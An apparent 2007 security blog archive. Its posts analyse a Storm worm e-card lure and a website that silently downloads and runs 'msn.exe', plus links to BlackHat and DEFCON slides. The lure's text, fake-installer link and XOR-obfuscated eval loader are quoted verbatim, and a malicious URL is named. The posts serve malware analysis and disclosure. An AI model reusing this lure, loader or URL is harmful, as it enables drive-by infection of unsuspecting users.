Archive for August, 2007

Ecard Worm is using “function kaspersky(suck,dick){};”

Posted in Uncategorized on August 15, 2007 by ianstarkc

This time ecard  aka  storm worm variant defined two function in the encoded java script. Just see the encoded Java Script..

“To view your ecard, you need to have Microsoft Data Access installed on your computer.<br> To obtain a free copy of Microsoft Data Access, please <a href=”/msdataaccess.exe”>click here</a>.<div id=”mydiv”></div><Script Language=’JavaScript’> function xor_str(plain_str, xor_key){ var xored_str = “”; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } function kaspersky(suck,dick){}; function kaspersky2(suck_dick,again){};var plain_str = “\x7d\x50\x57\x50\x57\x2b\x3c\x2f\x7d\x30\x30\x7d\x60\x7d\x33\x38\x2a\x7d\x1c\x2f\x2f\x3c\x24\x75\x74\x66\x50\x57\x2b\x3c\x2f\x7d\x30\x38\x30\x02\x3b\x31\x3c\x3a\x7d\x60\x7d\x6d\x66\x50\x57\x50\x57\x57\x50\x57\x50\x57\x2e\x29\x3c\x2f\x29\x75\x74\x66\x50\x57\x50\x57”; var xored_str = xor_str(plain_str, 93); eval(xored_str); </script>

Advertisements

BlackHat USA’07 & DEFCON 15

Posted in Uncategorized on August 9, 2007 by ianstarkc

Awesome conferences!! They’ll take time to upload the slides, meanwhile if you want to download their slides just check here

BlackHat USA’07

http://www.hotsecuritynews.com/bh-usa-07/             

Defcon-15

http://www.freelanceresearch.org/DEFCON_15.iso

http://bzimage.spymac.net/DEFCON_15.iso

http://garaged.homeip.net/DEFCON15/

“msn.exe” download using Script

Posted in Uncategorized on August 9, 2007 by ianstarkc

Some days before i got a website where infamous evil obfuscated  script was used to download malicious file from other website. The script is decoded through the use of eval() function and String.fromCharCode(). If you search using this function in google itself you’ll lots of websites and even you’ll get malicious one , that how i got!.
See the screenshots below..

when you open http://buyford.co.kr/1/1/1.htm …This html page has java script to download malicious file “msn.exe”from the IP, moreover i found that this IP is changing from time to time. “msn.exe” will download a file “test.txt” which is having the address of another malicious file “svchost.exe”. Just look at the screenshots you’ll come to know the story -:)
1

After decoding the script it looks like this ..on surfing the site  “The page cannot be found” will be displyed while in background VBScript would be run and download msn.exe from IP and saves it as  “zhu3.com” and finally excutes this file.

4

2

3

 Have a look at this slide

 “CaffeineMonkey: Automated Collection, Detection and Analysis of Malicious JavaScript” see at http://www.blackhat.com/html/bh-usa-07/bh-usa-07-speakers.html#Feinstein